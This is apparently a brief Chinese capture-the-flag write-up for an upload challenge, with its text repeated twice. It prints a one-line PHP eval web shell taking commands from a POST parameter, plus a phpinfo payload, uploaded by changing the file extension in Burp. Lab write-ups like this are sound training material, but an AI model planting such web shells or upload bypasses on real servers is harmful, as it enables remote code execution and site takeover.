发现是上传文件第一想到是文件木马 <?php @eval ($_POST[123]);?>木马上传burp修改后缀发现flag里面这个是假的 我们猜想是在phpinfo我们上传<?php @eval('phpinfo();');?>木马上传burp修改后缀里面 Ctrl+F 发现flag
[SWPUCTF 2021 新生赛]easyupload3.0
2024-02-05 05:58:06 58 阅读
发现是上传文件第一想到是文件木马 <?php @eval ($_POST[123]);?>木马上传burp修改后缀发现flag里面这个是假的 我们猜想是在phpinfo我们上传<?php @eval('phpinfo();');?>木马上传burp修改后缀里面 Ctrl+F 发现flag